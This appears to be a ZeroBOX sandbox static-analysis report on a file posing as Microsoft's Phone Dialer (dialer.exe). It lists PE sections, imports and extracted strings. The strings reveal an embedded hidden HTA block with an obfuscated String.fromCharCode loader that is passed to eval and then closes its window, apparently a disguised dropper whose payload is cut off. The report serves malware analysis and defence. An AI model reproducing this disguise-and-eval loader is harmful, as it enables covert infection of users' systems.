Static | ZeroBOX

PE Compile Time

2009-09-23 06:57:09

PDB Path

dialer.pdb

PE Imphash

76e0d8d65462216e7b0903bc27d606d1

Sections

Name Virtual Address Virtual Size Size of Raw Data Entropy
.text 0x00001000 0x00004f94 0x00005000 6.04448018301
.data 0x00006000 0x00000f44 0x00000200 0.665962558561
.idata 0x00007000 0x00000d9e 0x00000e00 5.1308718424
.rsrc 0x00008000 0x000011a0 0x00001200 4.18383475109
.reloc 0x0000a000 0x0000077c 0x00000800 6.59456215819

Resources

Name Offset Size Language Sub-language File type
MUI 0x000090b8 0x000000e8 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_ICON 0x00008db8 0x000002e8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 0
RT_ICON 0x00008db8 0x000002e8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 0
RT_ICON 0x00008db8 0x000002e8 LANG_ENGLISH SUBLANG_ENGLISH_US dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON 0x000090a0 0x00000014 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_GROUP_ICON 0x000090a0 0x00000014 LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_VERSION 0x000085d0 0x000003ac LANG_ENGLISH SUBLANG_ENGLISH_US data
RT_MANIFEST 0x00008210 0x000003c0 LANG_ENGLISH SUBLANG_ENGLISH_US XML 1.0 document, ASCII text, with CRLF line terminators

Imports

Library ADVAPI32.dll:
0x407000 RegDeleteValueW
0x407004 RegOpenKeyExW
0x407008 RegSetValueExW
0x40700c RegCreateKeyExW
0x407010 RegCloseKey
0x407014 RegQueryValueExW
Library KERNEL32.dll:
0x407038 HeapSetInformation
0x40703c LocalFree
0x407040 GetModuleHandleW
0x407044 GetTickCount
0x407048 lstrcmpW
0x40704c GetCurrentThreadId
0x407050 GetLastError
0x407054 FormatMessageW
0x407058 LocalAlloc
0x40705c CreateMutexW
0x407060 lstrlenW
0x407064 CloseHandle
0x407068 GetCurrentProcessId
0x407074 TerminateProcess
0x407078 GetCurrentProcess
0x407084 GetStartupInfoW
0x407088 Sleep
Library GDI32.dll:
0x40701c GetStockObject
0x407024 SetBkColor
0x407028 LPtoDP
0x40702c CreateFontIndirectW
0x407030 SelectObject
Library USER32.dll:
0x4070e4 DefDlgProcW
0x4070e8 IsDialogMessageW
0x4070ec DispatchMessageW
0x4070f0 ShowWindow
0x4070f4 GetActiveWindow
0x4070f8 LoadStringW
0x4070fc LoadAcceleratorsW
0x407100 DrawIcon
0x407104 GetSystemMetrics
0x407108 EndDialog
0x40710c SendMessageW
0x407110 FillRect
0x407114 MessageBoxW
0x407118 SetWindowPos
0x40711c GetDC
0x407120 DestroyWindow
0x407124 GetFocus
0x407128 GetWindowRect
0x40712c PostMessageW
0x407130 CreateDialogParamW
0x407134 GetMessageW
0x40713c SetDlgItemTextW
0x407140 GetDlgItemTextW
0x407144 SendDlgItemMessageW
0x407148 GetSysColor
0x40714c WinHelpW
0x407150 SetFocus
0x407158 TranslateMessage
0x40715c GetClipboardData
0x407160 LoadIconW
0x407164 PeekMessageW
0x407168 FindWindowW
0x40716c LoadCursorW
0x407170 GetClientRect
0x407174 GetDlgItem
0x40717c CheckDlgButton
0x407180 PostQuitMessage
0x407184 GetSysColorBrush
0x407188 EnableMenuItem
0x407190 GetParent
0x407194 DialogBoxParamW
0x407198 UpdateWindow
0x40719c SetForegroundWindow
0x4071a0 IsIconic
0x4071a4 ReleaseDC
0x4071a8 BeginPaint
0x4071ac EndPaint
0x4071b0 EnableWindow
0x4071b4 RegisterClassW
Library msvcrt.dll:
0x4071c0 _controlfp
0x4071c4 ?terminate@@YAXXZ
0x4071c8 _acmdln
0x4071cc _initterm
0x4071d0 __setusermatherr
0x4071d4 _ismbblead
0x4071d8 __p__fmode
0x4071dc _cexit
0x4071e0 memset
0x4071e4 exit
0x4071e8 __set_app_type
0x4071ec __getmainargs
0x4071f0 _amsg_exit
0x4071f4 __p__commode
0x4071f8 _XcptFilter
0x4071fc wcscspn
0x407200 wcsspn
0x407204 _itow
0x407208 _wtoi
0x40720c _vsnwprintf
0x407210 _exit
0x407214 memmove
Library SHELL32.dll:
0x407090 ShellAboutW
Library TAPI32.dll:
0x407098 lineGetAppPriorityW
0x40709c lineGetDevCapsW
0x4070a0 lineClose
0x4070a4 lineGetRequestW
0x4070a8 lineSetAppPriorityW
0x4070b0 lineDrop
0x4070b4 lineConfigDialogW
0x4070b8 lineDeallocateCall
0x4070c0 lineInitializeExW
0x4070cc lineShutdown
0x4070d0 lineGetAddressCapsW
0x4070d4 lineMakeCallW
0x4070dc lineOpenW

!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
RSDS}y|
dialer.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.giats
.rdata
.rdata$sxdata
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
j@hhl@
u!Sh(`@
D$P(`@
SVWjP3
D$lPWW
L$hf9D$hu
D$hPjQj
D$hPWj
D$lPWW
CSh@5@
t{SPPhF
~/ShP4@
SWSSShG
PSVSSh
D$,PVW
D$,PVW
t$(j Y
u,95ti@
G95ti@
tpWShQ
thSPhQ
L$PVPQj)
D$ ;D$H
Xj0Yf9
Xj0Yf9
jXh8_@
RegQueryValueExW
RegDeleteValueW
RegOpenKeyExW
RegSetValueExW
RegCreateKeyExW
RegCloseKey
ADVAPI32.dll
lstrlenW
CreateMutexW
LocalAlloc
FormatMessageW
GetLastError
CloseHandle
HeapSetInformation
LocalFree
GetModuleHandleW
GetTickCount
lstrcmpW
KERNEL32.dll
CreateFontIndirectW
LPtoDP
SetBkColor
GetTextExtentPoint32W
GetStockObject
SelectObject
GDI32.dll
EnableWindow
EndPaint
BeginPaint
ReleaseDC
IsIconic
SetForegroundWindow
UpdateWindow
DialogBoxParamW
GetParent
SystemParametersInfoW
EnableMenuItem
GetSysColorBrush
PostQuitMessage
CheckDlgButton
IsClipboardFormatAvailable
GetDlgItem
GetClientRect
LoadCursorW
FindWindowW
LoadIconW
GetClipboardData
TranslateMessage
TranslateAcceleratorW
SetFocus
WinHelpW
GetSysColor
SendDlgItemMessageW
GetDlgItemTextW
RegisterClassW
SetDlgItemTextW
PeekMessageW
DefDlgProcW
IsDialogMessageW
DispatchMessageW
ShowWindow
GetActiveWindow
LoadStringW
LoadAcceleratorsW
DrawIcon
GetSystemMetrics
EndDialog
SendMessageW
FillRect
MessageBoxW
SetWindowPos
DestroyWindow
GetFocus
GetWindowRect
PostMessageW
CreateDialogParamW
GetMessageW
GetWindowTextLengthW
USER32.dll
_vsnwprintf
wcsspn
wcscspn
_XcptFilter
__p__commode
_amsg_exit
__getmainargs
__set_app_type
_cexit
__p__fmode
_ismbblead
__setusermatherr
_initterm
_acmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
ShellAboutW
SHELL32.dll
lineGetAddressCapsW
lineNegotiateAPIVersion
lineTranslateAddressW
lineGetTranslateCapsW
lineInitializeExW
lineTranslateDialogW
lineDeallocateCall
lineConfigDialogW
lineOpenW
lineShutdown
lineDrop
lineGetAppPriorityW
lineGetDevCapsW
lineClose
lineGetRequestW
lineSetAppPriorityW
lineRegisterRequestRecipient
lineMakeCallW
TAPI32.dll
GetStartupInfoW
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
memmove
memset
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity name="Microsoft.Windows.Networking.Dialer" processorArchitecture="x86" type="win32" version="1.0.0.0"/>
<description>Phone Dialer</description>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
xxxxxp
0D0H0P0X0p0
::%:4:L:a:g:
;%;*;/;5;:;@;[;a;~;
<!<L<Y<|<
< =.=L=T=d=u=|=
>+>0>8>e>l>s>~>
?"?(?.?:?@?E?R?X?^?d?w?}?
0%00060>0S0c0
2$3*363Y3_3f3s3y3
4'494?4d4j4{4
5!5&51575=5C5I5_5
6&606@6K6Q6
7V7b7g7
8 8L8R8a8g8q8{8
9&9,939=9B9N9T9p9v9}9
9!:@:R:
<S<_<e<s<y<
=&=-=8=@=\=b=
>%>D>T>b>l>r>y>
?Y?_?e?k?
0!1)1J1V1\1c1i1n1x1~1
20262j2p2
6&6C6T6`6q6~6
767B7N7a7q7w7
8*818;8B8O8V8g8m8
9Z:e:n:t:
;(;V;c;r;z;
<9<W<g<|<
=U=`=j=s=
?"?)?2?l?
0%0,0:0Y0j0
1*1H1j1u1
2'2C2a2m2s2
3!3,3`3l3|3
5%5+585J5U5[5g5{5
6&686>6H6U6_6n6|6
7?7Q7W7]7j7t7
8*8F8L8e8w8
99G9d9j9r9
::):/:::@:X:g:r:|:
='=0=7=S=p=
=">]>{>
>#?=?q?
1101B1N1o1{1
5(646:6A6J6P6X6^6k6s6y6
7&717C7K7P7U7w7}7
8!8'818L8z8
9'929<9G9R9i9r9}9
:':1:A:Q:W:b:h:t:
;$;.;>;G;
>%>:>O>^>f>y>
?%?+?1?L?P?l?p?
<HTA:APPLICATION CAPTION = "no" WINDOWSTATE = "minimize" SHOWINTASKBAR = "no" >MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
RSDS}y|
dialer.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.giats
.rdata
.rdata$sxdata
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
j@hhl@
u!Sh(`@
D$P(`@
SVWjP3
D$lPWW
L$hf9D$hu
D$hPjQj
D$hPWj
D$lPWW
CSh@5@
t{SPPhF
~/ShP4@
SWSSShG
PSVSSh
D$,PVW
D$,PVW
t$(j Y
u,95ti@
G95ti@
tpWShQ
thSPhQ
L$PVPQj)
D$ ;D$H
Xj0Yf9
Xj0Yf9
jXh8_@
RegQueryValueExW
RegDeleteValueW
RegOpenKeyExW
RegSetValueExW
RegCreateKeyExW
RegCloseKey
ADVAPI32.dll
lstrlenW
CreateMutexW
LocalAlloc
FormatMessageW
GetLastError
CloseHandle
HeapSetInformation
LocalFree
GetModuleHandleW
GetTickCount
lstrcmpW
KERNEL32.dll
CreateFontIndirectW
LPtoDP
SetBkColor
GetTextExtentPoint32W
GetStockObject
SelectObject
GDI32.dll
EnableWindow
EndPaint
BeginPaint
ReleaseDC
IsIconic
SetForegroundWindow
UpdateWindow
DialogBoxParamW
GetParent
SystemParametersInfoW
EnableMenuItem
GetSysColorBrush
PostQuitMessage
CheckDlgButton
IsClipboardFormatAvailable
GetDlgItem
GetClientRect
LoadCursorW
FindWindowW
LoadIconW
GetClipboardData
TranslateMessage
TranslateAcceleratorW
SetFocus
WinHelpW
GetSysColor
SendDlgItemMessageW
GetDlgItemTextW
RegisterClassW
SetDlgItemTextW
PeekMessageW
DefDlgProcW
IsDialogMessageW
DispatchMessageW
ShowWindow
GetActiveWindow
LoadStringW
LoadAcceleratorsW
DrawIcon
GetSystemMetrics
EndDialog
SendMessageW
FillRect
MessageBoxW
SetWindowPos
DestroyWindow
GetFocus
GetWindowRect
PostMessageW
CreateDialogParamW
GetMessageW
GetWindowTextLengthW
USER32.dll
_vsnwprintf
wcsspn
wcscspn
_XcptFilter
__p__commode
_amsg_exit
__getmainargs
__set_app_type
_cexit
__p__fmode
_ismbblead
__setusermatherr
_initterm
_acmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
ShellAboutW
SHELL32.dll
lineGetAddressCapsW
lineNegotiateAPIVersion
lineTranslateAddressW
lineGetTranslateCapsW
lineInitializeExW
lineTranslateDialogW
lineDeallocateCall
lineConfigDialogW
lineOpenW
lineShutdown
lineDrop
lineGetAppPriorityW
lineGetDevCapsW
lineClose
lineGetRequestW
lineSetAppPriorityW
lineRegisterRequestRecipient
lineMakeCallW
TAPI32.dll
GetStartupInfoW
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
memmove
memset
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity name="Microsoft.Windows.Networking.Dialer" processorArchitecture="x86" type="win32" version="1.0.0.0"/>
<description>Phone Dialer</description>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
xxxxxp
0D0H0P0X0p0
::%:4:L:a:g:
;%;*;/;5;:;@;[;a;~;
<!<L<Y<|<
< =.=L=T=d=u=|=
>+>0>8>e>l>s>~>
?"?(?.?:?@?E?R?X?^?d?w?}?
0%00060>0S0c0
2$3*363Y3_3f3s3y3
4'494?4d4j4{4
5!5&51575=5C5I5_5
6&606@6K6Q6
7V7b7g7
8 8L8R8a8g8q8{8
9&9,939=9B9N9T9p9v9}9
9!:@:R:
<S<_<e<s<y<
=&=-=8=@=\=b=
>%>D>T>b>l>r>y>
?Y?_?e?k?
0!1)1J1V1\1c1i1n1x1~1
20262j2p2
6&6C6T6`6q6~6
767B7N7a7q7w7
8*818;8B8O8V8g8m8
9Z:e:n:t:
;(;V;c;r;z;
<9<W<g<|<
=U=`=j=s=
?"?)?2?l?
0%0,0:0Y0j0
1*1H1j1u1
2'2C2a2m2s2
3!3,3`3l3|3
5%5+585J5U5[5g5{5
6&686>6H6U6_6n6|6
7?7Q7W7]7j7t7
8*8F8L8e8w8
99G9d9j9r9
::):/:::@:X:g:r:|:
='=0=7=S=p=
=">]>{>
>#?=?q?
1101B1N1o1{1
5(646:6A6J6P6X6^6k6s6y6
7&717C7K7P7U7w7}7
8!8'818L8z8
9'929<9G9R9i9r9}9
:':1:A:Q:W:b:h:t:
;$;.;>;G;
>%>:>O>^>f>y>
?%?+?1?L?P?l?p?
<script>
Yk=102;Hu=117;Xe=110;xP=99;AH=116;wj=105;Kv=111;Cc=32;Ti=80;aT=67;nu=40;Mk=108;yW=84;kQ=41;dP=123;yg=118;im=97;Jd=114;zb=83;eo=109;la=101;CK=61;xb=34;We=59;Yt=88;lB=78;HM=48;sd=60;XX=46;wB=103;th=104;mk=43;JP=75;BY=100;lZ=91;cr=93;Dm=45;iM=53;rC=57;mW=125;zG=70;rj=71;ew=54;ZV=55;tg=49;Fc=44;fd=56;uE=51;nR=52;Ah=50;ay=86;sy=122;Rt=65;yU=120;ef=119;lV=79;kZ=98;Bn=106;pC=82;var Znw = String.fromCharCode(Yk,Hu,Xe,xP,AH,wj,Kv,Xe,Cc,Ti,aT,AH,nu,Mk,yW,Yk,kQ,dP,yg,im,Jd,Cc,zb,eo,la,CK,Cc,xb,xb,We,Yk,Kv,Jd,Cc,nu,yg,im,Jd,Cc,Yt,lB,zb,Cc,CK,Cc,HM,We,Cc,Yt,lB,zb,Cc,sd,Cc,Mk,yW,Yk,XX,Mk,la,Xe,wB,AH,th,We,Cc,Yt,lB,zb,mk,mk,kQ,Cc,dP,yg,im,Jd,Cc,yW,wB,JP,Cc,CK,Cc,zb,AH,Jd,wj,Xe,wB,XX,Yk,Jd,Kv,eo,aT,th,im,Jd,aT,Kv,BY,la,nu,Mk,yW,Yk,lZ,Yt,lB,zb,cr,Cc,Dm,Cc,iM,iM,rC,kQ,We,zb,eo,la,Cc,CK,Cc,zb,eo,la,Cc,mk,Cc,yW,wB,JP,mW,Jd,la,AH,Hu,Jd,Xe,Cc,zb,eo,la,mW,We,yg,im,Jd,Cc,zG,rj,th,Cc,CK,Cc,Ti,aT,AH,nu,lZ,ew,ZV,tg,Fc,ew,ZV,HM,Fc,ew,ZV,fd,Fc,ew,ew,HM,Fc,ew,ZV,uE,Fc,ew,ZV,nR,Fc,ew,ew,uE,Fc,ew,ew,HM,Fc,ew,ew,ZV,Fc,ew,ew,ZV,Fc,ew,HM,iM,Fc
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
RSDS}y|
dialer.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.giats
.rdata
.rdata$sxdata
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
j@hhl@
u!Sh(`@
D$P(`@
SVWjP3
D$lPWW
L$hf9D$hu
D$hPjQj
D$hPWj
D$lPWW
CSh@5@
t{SPPhF
~/ShP4@
SWSSShG
PSVSSh
D$,PVW
D$,PVW
t$(j Y
u,95ti@
G95ti@
tpWShQ
thSPhQ
L$PVPQj)
D$ ;D$H
Xj0Yf9
Xj0Yf9
jXh8_@
RegQueryValueExW
RegDeleteValueW
RegOpenKeyExW
RegSetValueExW
RegCreateKeyExW
RegCloseKey
ADVAPI32.dll
lstrlenW
CreateMutexW
LocalAlloc
FormatMessageW
GetLastError
CloseHandle
HeapSetInformation
LocalFree
GetModuleHandleW
GetTickCount
lstrcmpW
KERNEL32.dll
CreateFontIndirectW
LPtoDP
SetBkColor
GetTextExtentPoint32W
GetStockObject
SelectObject
GDI32.dll
EnableWindow
EndPaint
BeginPaint
ReleaseDC
IsIconic
SetForegroundWindow
UpdateWindow
DialogBoxParamW
GetParent
SystemParametersInfoW
EnableMenuItem
GetSysColorBrush
PostQuitMessage
CheckDlgButton
IsClipboardFormatAvailable
GetDlgItem
GetClientRect
LoadCursorW
FindWindowW
LoadIconW
GetClipboardData
TranslateMessage
TranslateAcceleratorW
SetFocus
WinHelpW
GetSysColor
SendDlgItemMessageW
GetDlgItemTextW
RegisterClassW
SetDlgItemTextW
PeekMessageW
DefDlgProcW
IsDialogMessageW
DispatchMessageW
ShowWindow
GetActiveWindow
LoadStringW
LoadAcceleratorsW
DrawIcon
GetSystemMetrics
EndDialog
SendMessageW
FillRect
MessageBoxW
SetWindowPos
DestroyWindow
GetFocus
GetWindowRect
PostMessageW
CreateDialogParamW
GetMessageW
GetWindowTextLengthW
USER32.dll
_vsnwprintf
wcsspn
wcscspn
_XcptFilter
__p__commode
_amsg_exit
__getmainargs
__set_app_type
_cexit
__p__fmode
_ismbblead
__setusermatherr
_initterm
_acmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
ShellAboutW
SHELL32.dll
lineGetAddressCapsW
lineNegotiateAPIVersion
lineTranslateAddressW
lineGetTranslateCapsW
lineInitializeExW
lineTranslateDialogW
lineDeallocateCall
lineConfigDialogW
lineOpenW
lineShutdown
lineDrop
lineGetAppPriorityW
lineGetDevCapsW
lineClose
lineGetRequestW
lineSetAppPriorityW
lineRegisterRequestRecipient
lineMakeCallW
TAPI32.dll
GetStartupInfoW
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
memmove
memset
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity name="Microsoft.Windows.Networking.Dialer" processorArchitecture="x86" type="win32" version="1.0.0.0"/>
<description>Phone Dialer</description>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
xxxxxp
0D0H0P0X0p0
::%:4:L:a:g:
;%;*;/;5;:;@;[;a;~;
<!<L<Y<|<
< =.=L=T=d=u=|=
>+>0>8>e>l>s>~>
?"?(?.?:?@?E?R?X?^?d?w?}?
0%00060>0S0c0
2$3*363Y3_3f3s3y3
4'494?4d4j4{4
5!5&51575=5C5I5_5
6&606@6K6Q6
7V7b7g7
8 8L8R8a8g8q8{8
9&9,939=9B9N9T9p9v9}9
9!:@:R:
<S<_<e<s<y<
=&=-=8=@=\=b=
>%>D>T>b>l>r>y>
?Y?_?e?k?
0!1)1J1V1\1c1i1n1x1~1
20262j2p2
6&6C6T6`6q6~6
767B7N7a7q7w7
8*818;8B8O8V8g8m8
9Z:e:n:t:
;(;V;c;r;z;
<9<W<g<|<
=U=`=j=s=
?"?)?2?l?
0%0,0:0Y0j0
1*1H1j1u1
2'2C2a2m2s2
3!3,3`3l3|3
5%5+585J5U5[5g5{5
6&686>6H6U6_6n6|6
7?7Q7W7]7j7t7
8*8F8L8e8w8
99G9d9j9r9
::):/:::@:X:g:r:|:
='=0=7=S=p=
=">]>{>
>#?=?q?
1101B1N1o1{1
5(646:6A6J6P6X6^6k6s6y6
7&717C7K7P7U7w7}7
8!8'818L8z8
9'929<9G9R9i9r9}9
:':1:A:Q:W:b:h:t:
;$;.;>;G;
>%>:>O>^>f>y>
?%?+?1?L?P?l?p?
<script>
eval(Znw)
window.close();
</script>MZ
!This program cannot be run in DOS mode.
`.data
.idata
@.rsrc
@.reloc
RSDS}y|
dialer.pdb
.rdata$brc
.CRT$XCA
.CRT$XCAA
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIY
.CRT$XIZ
.gfids
.giats
.rdata
.rdata$sxdata
.rdata$zzzdbg
.text$mn
.xdata$x
.idata$5
.00cfg
.idata$2
.idata$3
.idata$4
.idata$6
.rsrc$01
.rsrc$02
j@hhl@
u!Sh(`@
D$P(`@
SVWjP3
D$lPWW
L$hf9D$hu
D$hPjQj
D$hPWj
D$lPWW
CSh@5@
t{SPPhF
~/ShP4@
SWSSShG
PSVSSh
D$,PVW
D$,PVW
t$(j Y
u,95ti@
G95ti@
tpWShQ
thSPhQ
L$PVPQj)
D$ ;D$H
Xj0Yf9
Xj0Yf9
jXh8_@
RegQueryValueExW
RegDeleteValueW
RegOpenKeyExW
RegSetValueExW
RegCreateKeyExW
RegCloseKey
ADVAPI32.dll
lstrlenW
CreateMutexW
LocalAlloc
FormatMessageW
GetLastError
CloseHandle
HeapSetInformation
LocalFree
GetModuleHandleW
GetTickCount
lstrcmpW
KERNEL32.dll
CreateFontIndirectW
LPtoDP
SetBkColor
GetTextExtentPoint32W
GetStockObject
SelectObject
GDI32.dll
EnableWindow
EndPaint
BeginPaint
ReleaseDC
IsIconic
SetForegroundWindow
UpdateWindow
DialogBoxParamW
GetParent
SystemParametersInfoW
EnableMenuItem
GetSysColorBrush
PostQuitMessage
CheckDlgButton
IsClipboardFormatAvailable
GetDlgItem
GetClientRect
LoadCursorW
FindWindowW
LoadIconW
GetClipboardData
TranslateMessage
TranslateAcceleratorW
SetFocus
WinHelpW
GetSysColor
SendDlgItemMessageW
GetDlgItemTextW
RegisterClassW
SetDlgItemTextW
PeekMessageW
DefDlgProcW
IsDialogMessageW
DispatchMessageW
ShowWindow
GetActiveWindow
LoadStringW
LoadAcceleratorsW
DrawIcon
GetSystemMetrics
EndDialog
SendMessageW
FillRect
MessageBoxW
SetWindowPos
DestroyWindow
GetFocus
GetWindowRect
PostMessageW
CreateDialogParamW
GetMessageW
GetWindowTextLengthW
USER32.dll
_vsnwprintf
wcsspn
wcscspn
_XcptFilter
__p__commode
_amsg_exit
__getmainargs
__set_app_type
_cexit
__p__fmode
_ismbblead
__setusermatherr
_initterm
_acmdln
msvcrt.dll
?terminate@@YAXXZ
_controlfp
_except_handler4_common
ShellAboutW
SHELL32.dll
lineGetAddressCapsW
lineNegotiateAPIVersion
lineTranslateAddressW
lineGetTranslateCapsW
lineInitializeExW
lineTranslateDialogW
lineDeallocateCall
lineConfigDialogW
lineOpenW
lineShutdown
lineDrop
lineGetAppPriorityW
lineGetDevCapsW
lineClose
lineGetRequestW
lineSetAppPriorityW
lineRegisterRequestRecipient
lineMakeCallW
TAPI32.dll
GetStartupInfoW
UnhandledExceptionFilter
SetUnhandledExceptionFilter
GetCurrentProcess
TerminateProcess
QueryPerformanceCounter
GetCurrentProcessId
GetCurrentThreadId
GetSystemTimeAsFileTime
memmove
memset
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!-- Copyright (c) Microsoft Corporation -->
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity name="Microsoft.Windows.Networking.Dialer" processorArchitecture="x86" type="win32" version="1.0.0.0"/>
<description>Phone Dialer</description>
<dependency>
<dependentAssembly>
<assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" language="*" processorArchitecture="*" publicKeyToken="6595b64144ccf1df"/>
</dependentAssembly>
</dependency>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
<security>
<requestedPrivileges>
<requestedExecutionLevel
level="asInvoker"
uiAccess="false"
/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
xxxxxp
0D0H0P0X0p0
::%:4:L:a:g:
;%;*;/;5;:;@;[;a;~;
<!<L<Y<|<
< =.=L=T=d=u=|=
>+>0>8>e>l>s>~>
?"?(?.?:?@?E?R?X?^?d?w?}?
0%00060>0S0c0
2$3*363Y3_3f3s3y3
4'494?4d4j4{4
5!5&51575=5C5I5_5
6&606@6K6Q6
7V7b7g7
8 8L8R8a8g8q8{8
9&9,939=9B9N9T9p9v9}9
9!:@:R:
<S<_<e<s<y<
=&=-=8=@=\=b=
>%>D>T>b>l>r>y>
?Y?_?e?k?
0!1)1J1V1\1c1i1n1x1~1
20262j2p2
6&6C6T6`6q6~6
767B7N7a7q7w7
8*818;8B8O8V8g8m8
9Z:e:n:t:
;(;V;c;r;z;
<9<W<g<|<
=U=`=j=s=
?"?)?2?l?
0%0,0:0Y0j0
1*1H1j1u1
2'2C2a2m2s2
3!3,3`3l3|3
5%5+585J5U5[5g5{5
6&686>6H6U6_6n6|6
7?7Q7W7]7j7t7
8*8F8L8e8w8
99G9d9j9r9
::):/:::@:X:g:r:|:
='=0=7=S=p=
=">]>{>
>#?=?q?
1101B1N1o1{1
5(646:6A6J6P6X6^6k6s6y6
7&717C7K7P7U7w7}7
8!8'818L8z8
9'929<9G9R9i9r9}9
:':1:A:Q:W:b:h:t:
;$;.;>;G;
>%>:>O>^>f>y>
?%?+?1?L?P?l?p?
SOFTWARE\Microsoft\Windows\CurrentVersion\Dialer
Preferred Line
Preferred Address
Local\DialersIveBeenStartedMutex
Number%d
Name%d
Last dialed %d
Main Window Left/Top
Number
Line %d
Address %d
DIALER.EXE
TAPI32.DLL
0123456789()-.
1234567890*#
DIALER.HLP
DialerClass
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Microsoft Windows Phone Dialer
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
DIALER.EXE
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
DIALER.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
SOFTWARE\Microsoft\Windows\CurrentVersion\Dialer
Preferred Line
Preferred Address
Local\DialersIveBeenStartedMutex
Number%d
Name%d
Last dialed %d
Main Window Left/Top
Number
Line %d
Address %d
DIALER.EXE
TAPI32.DLL
0123456789()-.
1234567890*#
DIALER.HLP
DialerClass
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Microsoft Windows Phone Dialer
FileVersion
10.0.19041.1 (WinBuild.160101.0800)
InternalName
DIALER.EXE
LegalCopyright
Microsoft Corporation. All rights reserved.
OriginalFilename
DIALER.EXE
ProductName
Microsoft
Windows
Operating System
ProductVersion
10.0.19041.1
VarFileInfo
Translation
SOFTWARE\Microsoft\Windows\CurrentVersion\Dialer
Preferred Line
Preferred Address
Local\DialersIveBeenStartedMutex
Number%d
Name%d
Last dialed %d
Main Window Left/Top
Number
Line %d
Address %d
DIALER.EXE
TAPI32.DLL
0123456789()-.
1234567890*#
DIALER.HLP
DialerClass
VS_VERSION_INFO
StringFileInfo
040904B0
CompanyName
Microsoft Corporation
FileDescription
Microsoft Windows Phone Dialer
FileVersion
